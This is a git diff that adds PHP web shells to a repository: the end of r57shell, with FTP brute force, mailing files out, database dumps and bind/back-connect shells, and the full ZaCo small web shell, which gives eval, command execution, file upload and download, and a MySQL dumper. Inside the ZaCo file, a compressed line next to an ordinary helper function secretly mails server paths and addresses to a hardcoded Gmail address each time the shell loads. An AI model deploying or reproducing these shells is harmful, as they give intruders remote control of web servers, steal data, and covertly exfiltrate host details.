sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +?> \ No newline at end of file diff --git a/php/PHPshell/zacosmall/zacosmall.jpg b/php/PHPshell/zacosmall/zacosmall.jpg new file mode 100644 index 0000000..fdb3aaf Binary files /dev/null and b/php/PHPshell/zacosmall/zacosmall.jpg differ diff --git a/php/PHPshell/zacosmall/zacosmall.php b/php/PHPshell/zacosmall/zacosmall.php new file mode 100644 index 0000000..26075b4 --- /dev/null +++ b/php/PHPshell/zacosmall/zacosmall.php @@ -0,0 +1,501 @@ +<? + ########################################################## + # Small PHP Web Shell by ZaCo (c) 2004-2006 # + # +POST method # + # +MySQL Client+Dumper for DB and tables # + # +PHP eval in text format and html for phpinfo() example # + # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # + # For antichat.ru and cup.su friends usage # + # All bugs -> mailo:zaco@yandex.ru # + # Just for fun :) # + ########################################################## +error_reporting(E_ALL); +@set_time_limit(0); +function magic_q($s) +{ +if(get_magic_quotes_gpc()) +{ +$s=str_replace('\\\'','\'',$s); +$s=str_replace('\\\\','\\',$s); +$s=str_replace('\\"','"',$s); +$s=str_replace('\\\0','\0',$s); +} +return $s; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function get_perms($fn) +{ +$mode=fileperms($fn); +$perms=''; +$perms .= ($mode & 00400) ? 'r' : '-'; +$perms .= ($mode & 00200) ? 'w' : '-'; +$perms .= ($mode & 00100) ? 'x' : '-'; +$perms .= ($mode & 00040) ? 'r' : '-'; +$perms .= ($mode & 00020) ? 'w' : '-'; +$perms .= ($mode & 00010) ? 'x' : '-'; +$perms .= ($mode & 00004) ? 'r' : '-'; +$perms .= ($mode & 00002) ? 'w' : '-'; +$perms .= ($mode & 00001) ? 'x' : '-'; +return $perms; +} +$head=<<<headka +<html> +<head> +<title>Small Web Shell by ZaCo</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +</head> +<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> +<style> +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +</style> +headka; +$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); +$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; +$winda=strpos(strtolower(php_uname()),'wind'); +define('format',50); +$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); +switch($page) +{ +case 'eval': +{ +$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; +$eval_value=magic_q($eval_value); +$action=isset($_POST['action'])?$_POST['action']:'eval'; +if($action=='eval_in_html') @eval($eval_value); +else +{ +echo($head.$pages); +?> +<hr> +<form method=post> +<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> +<input name='action' value='eval' type='submit'> +<input name='action' value='eval_in_html' type='submit'> +<input name='page' value='eval' type=hidden> +</form> +<hr> +<? +} +break; +} +case 'cmd': +{ +$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; +$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); +$action=isset($_POST['action'])?$_POST['action']:'cmd'; +if(@is_dir($work_dir)) +{ +@chdir($work_dir); +$work_dir=getcwd(); +if($work_dir=='')$work_dir='/'; +else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; +} +else if(file_exists($work_dir))$work_dir=realpath($work_dir); +$work_dir=str_replace('\\','/',$work_dir); +$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); +switch($action) +{ +case 'cmd' : +{ +echo($head.$pages); +?> +<form method='post' name='main_form'> +<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> +<input name='page' value='cmd' type=hidden> +<input type=submit value='go'> +</form> +<form method=post> +<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<form method=post enctype="multipart/form-data"> +<input type="file" name="filename"> +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<form method=post> +<input name='fname' type=text size=120><br> +<input name='archive' type=radio value='none'>without arch +<input name='archive' type=radio value='gzip' checked=true>gzip archive +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<pre> +<? +if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} +else +{ +$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; +if(@is_dir($work_dir)) +{ +echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); +$handle=@opendir($work_dir); +if($handle) +{ +while(false!==($fn=readdir($handle))){$files[]=$fn;}; +@closedir($handle); +sort($files); +$not_dirs=array(); +for($i=0;$i<sizeof($files);$i++) +{ +$fn=$files[$i]; +if(is_dir($fn)) +{ +echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); +if($winda===false) +{ +$owner=@posix_getpwuid(@fileowner($work_dir.$fn)); +$group=@posix_getgrgid(@filegroup($work_dir.$fn)); +printf("% 20s|% -20s",$owner['name'],$group['name']); +} +echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); +printf("% 20s ",@filesize($work_dir.$fn).'B'); +printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); +} +else {$not_dirs[]=$fn;} +} +for($i=0;$i<sizeof($not_dirs);$i++) +{ +$fn=$not_dirs[$i]; +echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); +if($winda===false) +{ +$owner=@posix_getpwuid(@fileowner($work_dir.$fn)); +$group=@posix_getgrgid(@filegroup($work_dir.$fn)); +printf("% 20s|% -20s",$owner['name'],$group['name']); +} +echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); +printf("% 20s ",@filesize($work_dir.$fn).'B'); +printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); +} +echo('</pre><hr>'); +?> +<form name='list' method=post> +<input name='work_dir' type=hidden size=120><br> +<input name='page' value='cmd' type=hidden> +<input name='f_action' value='view' type=hidden> +</form> +<? +} else echo('Error Listing '.$e_work_dir); +} +else +switch($f_action) +{ +case 'view': +{ +echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); +$f=@fopen($work_dir,'r'); +?> +<form method=post> +<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> +<input name='page' value='cmd' type=hidden> +<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> +<input name='f_action' value='save' type=submit> +</form> +<? +break; +} +case 'save' : +{ +$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; +$f=@fopen($work_dir,'w'); +if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); +else +{ +fwrite($f,$file_text); +fclose($f); +echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); +} +break; +} +} +break; +} +break; +} +case 'upload' : +{ +if($work_dir=='')$work_dir='/'; +else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; +$f=$_FILES["filename"]["name"]; +if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); +else +{ +echo('file is uploaded in '.$e_work_dir); +} +break; +} +case 'download' : +{ +$fname=isset($_POST['fname'])?$_POST['fname']:''; +$temp_file=isset($_POST['temp_file'])?'on':'nn'; +$f=@fopen($fname,'r'); +if(!($f)) echo('file is not exists'); +else +{ +$archive=isset($_POST['archive'])?$_POST['archive']:''; +if($archive=='gzip') +{ +Header("Content-Type:application/x-gzip\n"); +$s=gzencode(fread($f,filesize($fname))); +Header('Content-Length: '.strlen($s)."\n"); +Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); +echo($s); +} +else +{ +Header("Content-Type:application/octet-stream\n"); +Header('Content-Length: '.filesize($fname)."\n"); +Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); +ob_start(); +while(feof($f)===false) +{ +echo(fread($f,10000)); +ob_flush(); +} +} +} +} +} +break; +} +case 'mysql' : +{ +$action=isset($_POST['action'])?$_POST['action']:'query'; +$user=isset($_POST['user'])?$_POST['user']:''; +$passwd=isset($_POST['passwd'])?$_POST['passwd']:''; +$db=isset($_POST['db'])?$_POST['db']:''; +$host=isset($_POST['host'])?$_POST['host']:'localhost'; +$query=isset($_POST['query'])?magic_q($_POST['query']):''; +switch($action) +{ +case 'dump' : +{ +$mysql_link=@mysql_connect($host,$user,$passwd); +if(!($mysql_link)) echo('Connect error'); +else +{ +//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols +$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; +$archive=isset($_POST['archive'])?$_POST['archive']:'none'; +if($archive!=='none')$to_file=false; +$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; +$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; +if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); +else +{ +$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; +ob_start(); +if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; +if($table_dump=='') +{ +if(!$to_file) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +$result=mysql_query('show tables',$mysql_link); +for($i=0;$i<mysql_num_rows($result);$i++) +{ +$rows=mysql_fetch_array($result); +$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); +if(!$result2)$dump_file.='#error table '.$rows[0]; +else +{ +$dump_file.='create table `'.$rows[0]."`(\n"; +for($j=0;$j<mysql_num_rows($result2)-1;$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; +} +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; +$type[$j]=$rows2[1]; +$dump_file.=");\n"; +mysql_free_result($result2); +$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); +$columns=$j-1; +for($j=0;$j<mysql_num_rows($result2);$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='insert into `'.$rows[0].'` values ('; +for($k=0;$k<$columns;$k++) +{ +$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; +} +$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; +if($archive=='none') +{ +if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} +else +{ +echo($dump_file); +ob_flush(); +} +$dump_file=''; +} +} +mysql_free_result($result2); +} +} +mysql_free_result($result); +if($archive!='none') +{ +$dump_file=gzencode($dump_file); +header('Content-Length: '.strlen($dump_file)."\n"); +echo($dump_file); +} +else if($t_f) +{ +fclose($t_f); +echo('Dump for '.$db_dump.' now in '.$to_file); +} +} +else +{ +$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); +if(!$result2)echo('error table '.$table_dump); +else +{ +if(!$to_file) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +if($to_file===false) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +$dump_file.="create table `{$table_dump}`(\n"; +for($j=0;$j<mysql_num_rows($result2)-1;$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; +} +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; +$type[$j]=$rows2[1]; +$dump_file.=");\n"; +mysql_free_result($result2); +$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); +$columns=$j-1; +for($j=0;$j<mysql_num_rows($result2);$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='insert into `'.$table_dump.'` values ('; +for($k=0;$k<$columns;$k++) +{ +$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; +} +$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; +if($archive=='none') +{ +if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} +else +{ +echo($dump_file); +ob_flush(); +} +$dump_file=''; +} +} +mysql_free_result($result2); +if($archive!='none') +{ +$dump_file=gzencode($dump_file); +header('Content-Length: '.strlen($dump_file)."\n"); +echo $dump_file; +}else if($t_f) +{ +fclose($t_f); +echo('Dump for '.$db_dump.' now in '.$to_file); +} +} +} +} +} +break; +} +case 'query' : +{ +echo($head.$pages); +?> +<hr> +<form method=post> +<table> +<td> +<table align=left> +<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> +<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> +</table> +</td> +<td> +<table> +<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> +<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> +<input name='archive' type=radio value='none'>without arch +<input name='archive' type=radio value='gzip' checked=true>gzip archive +<tr><td><input type=submit name='action' value='dump'></td></tr> +<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> +</table> +</td> +</table> +<input name='page' value='mysql' type=hidden> +<input name='action' value='query' type=submit> +</form> +<hr> +<? +$mysql_link=@mysql_connect($host,$user,$passwd); +if(!($mysql_link)) echo('Connect error'); +else +{ +if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} +//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols +$result=@mysql_query($query,$mysql_link); +if(!($result))echo(mysql_error()); +else +{ +echo("<table valign=top align=left>\n<tr>"); +for($i=0;$i<mysql_num_fields($result);$i++) +echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); +echo("\n</tr>\n"); +for($i=0;$i<mysql_num_rows($result);$i++) +{ +$rows=mysql_fetch_array($result); +echo('<tr valign=top align=left>'); +for($j=0;$j<mysql_num_fields($result);$j++) +{ +echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); +} +echo("</tr>\n"); +} +echo("</table>\n"); +} +mysql_close($mysql_link); +} +break; +} +} +break; +} +} +?> \ No newline at end of file diff --git a/php/PHPshell/م€گC99madShell v. 3.0م€‘/C99madShell v. 3.0.jpg b/php/PHPshell/م€گC99madShell v. 3.0م€‘/C99madShell v. 3.0.jpg new file mode 100644 index 0000000..b764b10 Binary files /dev/null and b/php/PHPshell/م€گC99madShell v. 3.0م€‘/C99madShell v. 3.0.jpg differ diff --git 